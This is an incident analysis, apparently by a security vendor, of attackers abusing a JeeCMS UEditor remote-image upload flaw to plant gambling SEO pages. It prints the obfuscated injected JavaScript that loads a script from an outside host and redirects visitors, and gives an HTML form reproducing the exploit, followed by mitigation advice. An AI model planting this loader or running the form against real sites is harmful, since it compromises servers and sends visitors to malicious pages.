JeeCMS漏洞竟沦为黑产SEO的秘密武器?

  • 来源:深信服安全中心
  • 发布时间:2019-04-10
#

事件描述

背景概述

2019年3月26日 166左右网站目录下产生大量恶意文件

 

入侵分析

3

 

image.png恶意代码内容如下:

[removed]var _0x150a=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x61\x70\x69\x38\x38\x38\x2E\x63\x6F\x6D\x2F\x67\x6C\x6F\x62\x61\x6C\x2F\x73\x74\x61\x74\x69\x63\x2F\x6A\x73\x2F\x74\x2E\x70\x68\x70\x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0x150a[1]](_0x150a[0]);[removed]

http://atapi888.com/global/static/js/t.phpjs内容如下图所示:

 

http://atapi888.com/global/static/js/t.php后,发现返回内容同样为编码后的内容,如下图所示:

 

image.pngimage.png将以上编码的内容hex转换解码后得到如下图所示网址,即通过windows.location.href打开新窗口https://www.1851147.com。

 

image.png查杀网站中的webshell后门,没有发现任何webshell网页木马,如下图所示:

 

image.pngimage.pngweb日志中可以发现在某个固定时间点,攻击者发送了大量POST数据包,目标的URL为:image.pngUeditorAct.class文件进行反编译,分析/ueditor/getRemoteImage.jspx接口,该接口的主要功能是读取远程服务器上的资源并且未对资源的类型或者后缀进行判断并直接将其写入到/u/cms/www/目录下。此处同样存在SSRFimage.png远程攻击者可借助upfile参数利用服务器端请求伪造漏洞漏洞获取敏感信息,攻击内部网络主机或写入恶意文件。

漏洞复现

模拟远程主机IP:192.168.231.134

http://ld8.me/multipart.php

由于代码端上传的时候直接是用参数upfile,为了方便构造数据包也可以直接构造一个表单来完成此次的操作。表单构造内容如下图所示:

<form action="http://</span>/ueditor/getRemoteImage.jspx" method="post" enctype="multipart/form-data">

<input name="upfile" value="ue_separate_ue"></span>

<input type="submit"></span>

</form></span>

image.png模拟植入博彩页面效果

192.168.231.134上的test.html文件。

image.png模拟批量植入博彩页面效果

 

image.png 


解决方案

防御方案

1、通过深信服下一代防火墙暂时限制对/ueditor/getRemoteImage.jspx接口的访问。

2、升级JeeCMS到最新版本。

参考链接

https://cxsecurity.com/issue/WLB-2018040057

https://www.cnblogs.com/rebeyond/p/5141226.html